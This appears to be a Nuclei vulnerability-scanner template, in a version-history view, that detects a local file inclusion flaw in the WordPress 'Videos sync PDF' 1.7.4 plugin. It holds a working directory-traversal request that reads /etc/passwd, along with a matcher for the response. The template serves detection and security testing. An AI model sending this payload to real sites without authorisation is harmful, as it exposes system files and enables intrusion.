nuclei-templates/vulnerabilities/wordpress/video-synchro-pdf-lfi.yaml

33 lines
875 B
YAML
Raw Normal View History

2022-04-02 09:55:19 +00:00
id: video-synchro-pdf-lfi
2022-03-30 05:42:22 +00:00
info:
name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
2022-03-30 05:42:22 +00:00
author: Hassan Khan Yusufzai - Splint3r7
severity: high
description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
2022-04-02 09:55:19 +00:00
reference:
- https://www.exploit-db.com/exploits/50844
- https://wordpress.org/plugins/video-synchro-pdf/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2022-03-30 05:42:22 +00:00
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
2022-04-03 09:17:31 +00:00
- '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
2022-03-30 05:42:22 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
2022-04-02 09:55:19 +00:00
- 200
# Enhanced by mp on 2022/07/29